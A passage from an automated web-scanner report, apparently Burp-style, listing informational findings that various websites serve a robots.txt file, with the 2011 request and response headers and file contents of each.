Host: www.dailyjournalonline.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2110684
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 02:30:09 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0409
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: dailyjournalonline.com
X-TNCMS-Served-By: cmsapp4
Content-Length: 1197

User-agent: MSNBot
Crawl-delay: 3
Disallow: /
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /search/

User-agent: Slurp
Crawl-delay: 3
Disallow: /
Disallow: /content
...[SNIP]...

27.420. http://www.dailyorange.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyorange.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailyorange.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:13 GMT
Server: Apache
Last-Modified: Wed, 05 Jan 2011 21:48:00 GMT
ETag: W/"26-1294264080000"
Content-Length: 26
Age: 625
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.421. http://www.dairylandauto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dairylandauto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dairylandauto.com

Response

HTTP/1.1 200 OK
X-Powered-By: Sentry Insurance Server
ETag: W/"126-1263497554000"
Last-Modified: Thu, 14 Jan 2010 19:32:34 GMT
Content-Type: text/plain
Content-Length: 126
Date: Wed, 04 May 2011 03:58:03 GMT
Connection: close
Server: Sentry Insurance server
Set-Cookie: BIGipServerDAIRYLANDAUTO-POOL-8092=2418278922.39967.0000; path=/
Vary: *
Set-cookie: NLSessionCwwwdairylandautocom=Gxhz32pz7dNd1b+2jZq0/iIIRw7n5nwypwm5fbUNEgdnbI+hqqEiDlDJAtWB5gagPYyiTgxuLjOPU9g9kqCHBb9c6pYx6h4CIfu/nN5pPtRrDLICrPcjhdmc+1D23H6O;path=/;domain=dairylandauto.com

User-Agent: *
Disallow: /images
Disallow: /theme
Disallow: /javascript

Sitemap: http://www.dairylandauto.com/sitemap.xml

27.422. http://www.dallasvoice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dallasvoice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dallasvoice.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:04:39 GMT
Server: LiteSpeed
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b64df9d0fcf71cd66a20e14de1695b8c; path=/
Set-Cookie: wordpress_f228dac78415ba8cb91da8ff6c2e7d15=%7C1305684279%7C89edac1724ddfd6c47aa66686b66c4ec; expires=Wed, 18-May-2011 02:04:39 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_f228dac78415ba8cb91da8ff6c2e7d15=%7C1305684279%7C89edac1724ddfd6c47aa66686b66c4ec; expires=Wed, 18-May-2011 02:04:39 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_f228dac78415ba8cb91da8ff6c2e7d15=%7C1305684279%7Cb8b85cb7352c470ca7d885232d992fa5; expires=Wed, 18-May-2011 02:04:39 GMT; path=/; httponly
X-Pingback: http://www.dallasvoice.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Type: text/plain; charset=utf-8
Content-Length: 161
Vary: User-Agent

# Added by Link Alias Generator (LAG) module
User-agent: *
Disallow: /go/
# End LAG

User-agent: *
Disallow:

Sitemap: http://www.dallasvoice.com/sitemap.xml.gz

27.423. http://www.dancewithshadows.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dancewithshadows.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dancewithshadows.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:56:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 24 Jan 2009 15:46:58 GMT
ETag: "1a9c1aa-118-4613c6a686080"
Accept-Ranges: bytes
Content-Length: 280
Connection: close
Content-Type: text/plain

# robots.txt file created at http://www.searchenginepromotionhelp.com/
# Mon, 16 Jul 2007 14:54:58 -0400

# Exclude Files From All Robots:

User-agent: *
Disallow: /crowd/story/
Disallow: /crowd/login
...[SNIP]...

27.424. http://www.danielpipes.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.danielpipes.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.danielpipes.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 15 Sep 2008 07:53:41 GMT
ETag: "3ea803f-d1-456ea889a6b40"
Accept-Ranges: bytes
Content-Length: 209
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /search/
Disallow: /admin/
Disallow: /list/
Disallow: /images/
Disallow: /img/
Disallow: /pics/

User-agent: Googlebot
Disallow: /*.gif$
Disallow: /*.jpg$
Disallow:
...[SNIP]...

27.425. http://www.danomatic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.danomatic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.danomatic.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:37:28 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.danomatic.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.426. http://www.dastelefonbuch.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dastelefonbuch.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dastelefonbuch.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:56:07 GMT
Server: Apache
ETag: W/"1498-1303999067000"
Last-Modified: Thu, 28 Apr 2011 13:57:47 GMT
Content-Length: 1498
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for http://www.dastelefonbuch.de/
# bz 20110222

User-agent: gonzo*
Disallow: /katalog/
Disallow: /telefonbuch/
Disallow: /*taoid*
Disallow: /*tid*
Disallow: /scripts/
Disallow: /styles/

...[SNIP]...

27.427. http://www.davesmarketplace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.davesmarketplace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.davesmarketplace.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Aug 2010 01:27:39 GMT
Accept-Ranges: bytes
ETag: "7a4737e23ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:09:47 GMT
Connection: close
Content-Length: 268

User-agent: *
Disallow: /admin/
Disallow: /foundation/
Disallow: /billbacks/
Disallow: /cthq/
Disallow: /documents/
Disallow: /email/
Disallow: /images/
Disallow: /oldpages/
Disallow: /oldima
...[SNIP]...

27.428. http://www.dawgsbynature.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dawgsbynature.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dawgsbynature.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:22:31 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:40 GMT
ETag: "5601ba-d0-49e83f7b0eac5"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

27.429. http://www.daz3d.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.daz3d.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.daz3d.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:04:58 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.2.17 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 06 Oct 2010 20:00:20 GMT
ETag: "86-491f83a20fd00"
Accept-Ranges: bytes
Content-Length: 134
Cache-Control: public, must-revalidate
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /administration/
Disallow: /bugs/
Disallow: /timesheet/
Disallow: /i/edu
Disallow: /i.x/edu

27.430. http://www.dbrl.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dbrl.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dbrl.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:10:59 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 06 Sep 2010 10:37:16 GMT
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 04:10:59 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.431. http://www.dctheatrescene.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dctheatrescene.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dctheatrescene.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:01 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 30 Oct 2009 01:46:37 GMT
ETag: "1da68003-d2-4771d32ce9940"
Accept-Ranges: bytes
Content-Length: 210
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-includes/


# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://dctheatrescene.com/sitemap.xml.gz
# END XML-SITEM
...[SNIP]...

27.432. http://www.deanza.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deanza.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deanza.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 20 Jan 2011 16:31:07 GMT
ETag: "3b50018-af-49a49a91728c0"
Accept-Ranges: bytes
Content-Length: 175
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Language: en

# robots.txt
# 4/30/2003 modified 3/22/2004, 8/7/2007, 9/30/2009

User-agent: *
Disallow: /em
Disallow: /cgi-bin
Disallow: /images
Disallow: /template
Disallow: /studentvote

27.433. http://www.debbieschlussel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.debbieschlussel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.debbieschlussel.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:08 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.debbieschlussel.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 03:27:08 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.debbieschlussel.com/sitemap.xml

27.434. http://www.degreedriven.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.degreedriven.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.degreedriven.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=utf-8
Date: Wed, 04 May 2011 01:30:54 GMT
X-Pingback: http://www.degreedriven.com/xmlrpc.php
Connection: close
Set-Cookie: X-Mapping-jhoibjei=07304E9F5880AA952F5A722A2436E24C; path=/
Content-Length: 77

User-agent: *
Disallow:

Sitemap: http://www.degreedriven.com/sitemap.xml.gz

27.435. http://www.deguate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deguate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deguate.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:33:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 25 Mar 2011 23:35:52 GMT
ETag: "9d0b30-19-49f570df56600"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:


27.436. http://www.details.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.details.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.details.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "b84a7f2aba7a9fdf1273334c514875e8:1257435538"
Last-Modified: Thu, 05 Nov 2009 15:38:58 GMT
Accept-Ranges: bytes
Content-Length: 67
Content-Type: text/plain
Date: Wed, 04 May 2011 03:16:40 GMT
Connection: close
X-N: S

User-agent: *
Allow: /
Sitemap: http://www.details.com/sitemap.xml

27.437. http://www.dex.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dex.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dex.com

Response

HTTP/1.1 200 OK
ETag: "1717-6e-4a899a2e"
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2009 17:58:06 GMT
Connection: Close
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=0+0;age=0;ecid=90247000667,0)
Content-Length: 110
Date: Sun, 07 Nov 2010 21:39:35 GMT
Accept-Ranges: bytes

User-agent: *
Disallow: /Templates/
Disallow: /.svn/
Disallow: /test/

Sitemap: http://www.dex.com/sitemap.xml

27.438. http://www.dezignwithaz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dezignwithaz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dezignwithaz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:28:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 05 Aug 2008 05:31:32 GMT
Accept-Ranges: bytes
Content-Length: 2529
Connection: close
Content-Type: text/plain

# CRELoaded Generated Robots.txt
# Robot Exclusion File -- robots.txt
# Author: CRELoaded Team
# Last Updated : May 11th 2005
#enhancements by Ted C

User-Agent: *
Disallow: /admin/
Disallow
...[SNIP]...

27.439. http://www.diabetesnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diabetesnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diabetesnet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:13 GMT
Server: Apache/2.2.15 (Unix) PHP/5.2.14 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/1.0.0d mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.8.9
Last-Modified: Mon, 02 May 2011 16:22:50 GMT
ETag: "3c4064d-63e-4a24d6f47ca80"
Accept-Ranges: bytes
Content-Length: 1598
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.440. http://www.diamond.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diamond.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diamond.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 03 May 2011 17:39:14 GMT
Content-Type: text/plain
Connection: close
Content-Length: 104
Last-Modified: Sun, 19 Dec 2010 22:51:16 GMT
Accept-Ranges: bytes
ETag: "8a73a23ecf9fcb1:1bc8"
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=7166A98EEEA74556; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.diamond.com

User-agent: *
Disallow: /campaigns/
Disallow: /sem/
Sitemap: http://www.diamond.com/sitemap_index.xml

27.441. http://www.diamondshark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diamondshark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diamondshark.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Wed, 28 Apr 2010 08:15:14 GMT
Accept-Ranges: bytes
ETag: "055afedaae6ca1:10e2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:29:27 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

27.442. http://www.diesel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diesel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diesel.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Mar 2011 14:54:31 GMT
ETag: "437801e-1ce-3cd4b7c0"
Content-Type: text/plain
Date: Wed, 04 May 2011 03:47:32 GMT
Content-Length: 462
Connection: close

Sitemap: http://www.diesel.com/sitemap.xml
User-agent: *
Disallow: /alberto
Disallow: /crm
Disallow: /xml
Disallow: /swf
Disallow: /subsidiary
Disallow: /jointhebraves
Disallow: /hr
Disallow: /bestupi
...[SNIP]...

27.443. http://www.diethealthclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diethealthclub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diethealthclub.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 09 Sep 2009 11:18:36 GMT
ETag: "2bf85bc-79-473233e78db00"
Accept-Ranges: bytes
Content-Length: 121
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /email_friend.php
Disallow: /feedback.php
Disallow: /suggest_treatment.php
Disallow: /*cat_id

27.444. http://www.dietpilluniverse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dietpilluniverse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dietpilluniverse.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:50 GMT
Server: Apache
Last-Modified: Thu, 10 Jun 2010 18:06:36 GMT
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=2592000, public
Expires: Fri, 03 Jun 2011 01:26:50 GMT
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=utf-8

User-Agent: *
Allow: /

27.445. http://www.digitalart.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitalart.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.digitalart.org

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 01:13:48 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-chcfmbmj=33DA6723A49CE218C1D7BD1E4A7A789A; path=/
Last-Modified: Mon, 04 Apr 2011 14:44:05 GMT
Content-Length: 179

User-agent: *
Disallow: /cwonpu1999/
Disallow: /cwonpu1999/?ID=7528&section=comments
Disallow: /cwonpu1999/?ID=7528&section=artwork
Disallow: /cwonpu1999/?ID=7528&section=profile

27.446. http://www.digitalbattle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitalbattle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.digitalbattle.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:28:44 GMT
Server: Apache/2.2.17
X-Pingback: http://www.digitalbattle.com/xmlrpc.php
Content-Length: 75
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.digitalbattle.com/sitemap.xml

27.447. http://www.digitalcamerainfo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitalcamerainfo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.digitalcamerainfo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 02:15:41 GMT
Content-Type: text/plain
Content-Length: 204
Last-Modified: Tue, 22 Mar 2011 15:38:31 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.448. http://www.digitalhome.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitalhome.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.digitalhome.ca

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:01 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 24 Apr 2007 13:47:23 GMT
ETag: "8380e9a-4a7-42edc067730c0"
Accept-Ranges: bytes
Content-Length: 1191
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

27.449. http://www.directbuytire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directbuytire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.directbuytire.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Sun, 19 Dec 2010 21:44:02 GMT
Accept-Ranges: bytes
ETag: "d19327dac59fcb1:7e23"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:15:47 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

27.450. http://www.discountcigarettesmall.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discountcigarettesmall.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.discountcigarettesmall.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:40:16 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Mon, 24 Nov 2008 15:00:53 GMT
ETag: "2d6426-18-45c70a947f340"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

27.451. http://www.discoverneem.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discoverneem.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.discoverneem.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:03 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.discoverneem.com/1TCbEFSf.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
Di
...[SNIP]...

27.452. http://www.diva-girl-parties-and-stuff.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diva-girl-parties-and-stuff.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diva-girl-parties-and-stuff.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:25 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.diva-girl-parties-and-stuff.com/u0RuqMoz.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Dis
...[SNIP]...

27.453. http://www.dizzed.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dizzed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dizzed.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 11 Apr 2011 06:59:16 GMT
ETag: "118807d-57c-4a09f1d243900"
Accept-Ranges: bytes
Content-Length: 1404
Connection: close
Content-Type: text/plain

# 1) this filename (robots.txt) must stay lowercase
# 2) this file must be in the servers root directory
#    ex: http://www.mydomain.com/pliggsubfolder/ -- you must move the robots.txt from
#    /pliggsu
...[SNIP]...

27.454. http://www.dlrwebservice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dlrwebservice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dlrwebservice.com

Response

HTTP/1.1 200 OK
Content-Length: 29
Content-Type: text/plain
Last-Modified: Mon, 25 Oct 2010 17:34:39 GMT
Accept-Ranges: bytes
ETag: "f76f92e66a74cb1:27b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:13:09 GMT
Connection: close

...User-agent: *
Disallow: /

27.455. http://www.do-it-yourself-help.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.do-it-yourself-help.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.do-it-yourself-help.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:33 GMT
Server: Apache
Last-Modified: Mon, 13 Apr 2009 21:55:41 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 195
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /.cpc/
